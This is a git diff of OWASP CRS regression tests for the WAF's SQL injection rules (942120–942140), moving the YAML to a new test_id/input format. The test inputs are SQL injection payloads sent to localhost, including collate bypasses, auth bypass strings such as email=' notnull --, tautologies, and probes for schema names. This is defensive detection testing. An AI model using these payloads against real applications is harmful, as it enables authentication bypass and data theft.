HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372cf..7811cf31f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -2,159 +2,147 @@ meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" description: None - enabled: true - name: 942130.yaml tests: - - test_title: 942130-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - test_title: 942130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a=42%20like%2042" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=This%20is%20like%20no%20other" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=42<=>42" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" - version: HTTP/1.1 - output: - log_contains: id "942130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 934a8ac84..7d5c7de4d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -2,113 +2,105 @@ meta: author: "Felipe Zipitria" description: SQL Tautology - enabled: true - name: 942131.yaml +rule_id: 942131 tests: - - test_title: 942131-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%202" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%201" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '2'" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '1'" - version: HTTP/1.1 - output: - no_log_contains: id "942131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + no_log_contains: id "942131" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index e05f3f23c..d839c8ee4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -2,294 +2,275 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" description: None - enabled: true - name: 942140.yaml tests: - - test_title: 942140-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 